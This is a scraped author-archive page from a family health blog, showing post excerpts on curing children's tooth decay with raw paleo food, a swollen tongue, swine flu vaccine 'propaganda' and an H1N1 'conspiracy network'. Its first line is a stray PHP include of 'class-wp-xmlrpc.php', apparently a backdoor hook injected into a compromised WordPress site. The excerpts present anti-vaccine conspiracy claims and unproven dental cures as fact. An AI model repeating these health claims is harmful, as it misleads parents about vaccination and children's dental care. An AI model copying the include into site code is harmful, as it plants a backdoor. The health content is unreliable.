@include(ABSPATH . WPINC .'/class-wp-xmlrpc.php'); Good Samaritan, Author at My Family Health Blog - Page 141 of 235

Author: Good Samaritan

Pushing the Cure Tooth Decay Protocol to my children

We’ve known our eldest child has some tooth decay on his temporary teeth.  Now our 3rd child is detected to have some tooth decay.  So I’ve been hammering for more raw paleo food on my family, which falls on deaf ears because I’m the only one doing raw paleo...

I wake up with the left side of my tongue inflamed

Not funny, I woke up with the left side of my tongue inflamed.  It seemed as if a cockroach or a mosquito went in and bit my tongue.  Here are a couple of guesses I have what caused this: My wife thinks I was asleep and somehow I bit...

Swine Flu 1976 Vaccine Propaganda and the 4,000 Victims Expose

CBS ” 60 MINUTES” documentary on the swine flu epidemics of 1976 in the U.S. It went on air only once and was never shown again. Swine Flu 1976 & Propaganda Uploaded by Dianequiose-4. – Discover more webcam videos and video blogs. “They” are doing the same thing again...

Dr Leonard Horowitz Exposes H1N1 Swine Flu Conspiracy Network

Dr. Leonard Horowitz is a knowledgable and altruistic truth in health activist.  Dr. Horowitz names a company called Novavax and the CDC and more.  I’ve always stated that I smell bullsh… with regards to the h1n1 swine flu hysteria.  Dr. Horowitz puts the names, companies and agencies involved. (28...

Dengue fever a more serious threat than A(H1N1) – Department of Education

Daily Tribune Newspaper Page 6 (24 June 2009) “While media have been concentrating much on the Influenza A(H1N1), the Department of Education (DepEd) yesterday reminded school administrators to work closely with the Parents-Teachers Associations (PTAs), Local Government Units (LGUs) and Municipal Health Offices to protect the schools and communities...